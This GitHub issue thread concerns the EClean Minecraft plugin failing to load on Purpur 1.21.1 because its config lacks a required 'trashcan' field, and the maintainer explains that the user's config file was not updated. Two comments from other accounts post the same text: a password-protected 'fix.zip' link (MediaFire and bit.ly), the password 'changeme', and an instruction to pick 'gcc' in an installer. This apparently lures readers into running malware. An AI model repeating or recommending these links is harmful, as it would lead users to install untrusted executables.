### ISSUE TITLE
希望兼容1.21.1

### ISSUE THREAD

**Issue by NeglectDream** [4o4E/EClean#29]
无法加载，报错如下

[00:00:50 INFO]: [EClean] Enabling EClean v1.18.1
[00:00:51 ERROR]: Error occurred while enabling EClean v1.18.1 (Is it up to date?)
top.e404.eclean.relocate.kaml.MissingRequiredPropertyException: Property 'trashcan' is required but it is missing.
        at [清理优化]EClean.jar/top.e404.eclean.relocate.kaml.YamlInput.throwIfMissingRequiredPropertyException(YamlInput.kt:122) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.relocate.kaml.YamlInput.decodeSerializableValue(YamlInput.kt:113) ~[[清 理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.relocate.kaml.Yaml.decodeFromSource(Yaml.kt:65) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.relocate.kaml.Yaml.decodeFromString(Yaml.kt:55) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.relocate.eplugin.config.KtxConfig.load(KtxConfig.kt:73) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.EClean.onEnable(EClean.kt:59) ~[[清理优化]EClean.jar:?]
        at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:288) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
        at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:202) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:109) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:520) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
        at org.bukkit.craftbukkit.CraftServer.enablePlugin(CraftServer.java:654) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at org.bukkit.craftbukkit.CraftServer.enablePlugins(CraftServer.java:603) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:757) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:519) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at net.minecraft.server.dedicated.DedicatedServer.initServer(DedicatedServer.java:363) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1230) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:333) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at java.base/java.lang.Thread.run(Thread.java:1583) ~[?:?]
Caused by: top.e404.eclean.relocate.kotlinx.serialization.MissingFieldException: Field 'trashcan' is required for type with serial name 'top.e404.eclean.config.ConfigData', but it was missing
        at [清理优化]EClean.jar/top.e404.eclean.relocate.kotlinx.serialization.internal.PluginExceptionsKt.throwMissingFieldException(PluginExceptions.kt:20) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.config.ConfigData.<init>(Config.kt:32) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.config.ConfigData$$serializer.deserialize(Config.kt:32) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.config.ConfigData$$serializer.deserialize(Config.kt:32) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.relocate.kotlinx.serialization.encoding.Decoder$DefaultImpls.decodeSerializableValue(Decoding.kt:257) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.relocate.kotlinx.serialization.encoding.AbstractDecoder.decodeSerializableValue(AbstractDecoder.kt:16) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.relocate.kaml.YamlInput.decodeSerializableValue(YamlInput.kt:111) ~[[清 理优化]EClean.jar:?]
        ... 16 more
[00:00:51 INFO]: [EClean] Disabling EClean v1.18.1
[00:00:51 ERROR]: Error occurred while disabling EClean v1.18.1
top.e404.eclean.relocate.kotlin.UninitializedPropertyAccessException: lateinit property config has not been initialized
        at [清理优化]EClean.jar/top.e404.eclean.relocate.eplugin.config.KtxConfig.getConfig(KtxConfig.kt:39) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.EClean.getDebug(EClean.kt:46) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.relocate.eplugin.menu.EMenuManager.shutdown(EMenuManager.kt:148) ~[[清理优化]EClean.jar:?]
        at [清理优化]EClean.jar/top.e404.eclean.EClean.onDisable(EClean.kt:72) ~[[清理优化]EClean.jar:?]
        at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:291) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
        at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.disablePlugin(PaperPluginInstanceManager.java:237) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.disablePlugin(PaperPluginManagerImpl.java:114) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at org.bukkit.plugin.SimplePluginManager.disablePlugin(SimplePluginManager.java:550) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
        at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:206) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:109) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:520) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
        at org.bukkit.craftbukkit.CraftServer.enablePlugin(CraftServer.java:654) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at org.bukkit.craftbukkit.CraftServer.enablePlugins(CraftServer.java:603) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:757) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:519) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at net.minecraft.server.dedicated.DedicatedServer.initServer(DedicatedServer.java:363) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1230) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:333) ~[purpur-1.21.1.jar:1.21.1-2286-366af80]
        at java.base/java.lang.Thread.run(Thread.java:1583) ~[?:?]

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 4o4E** [comment]
你的配置文件没更新

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
